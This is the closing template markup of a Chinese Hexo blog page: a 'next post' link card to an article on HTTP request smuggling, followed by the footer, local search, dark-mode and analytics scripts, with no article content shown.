            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2025/12/05/http-qing-qiu-zou-si/">
                    <div class="card-image">
                        
                        <img src="https://marin-1347161933.cos.ap-guangzhou.myqcloud.com/img/2.jpg" class="responsive-img" alt="HTTP 请求走私">
                        
                        <span class="card-title">HTTP 请求走私</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2025-12-05
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/WEB/" class="post-category">
                                    WEB
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/web/">
                        <span class="chip bg-color">web</span>
                    </a>
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                        <span class="chip bg-color">漏洞</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4, h5, h6'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">Marin</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">














</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    
    
    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
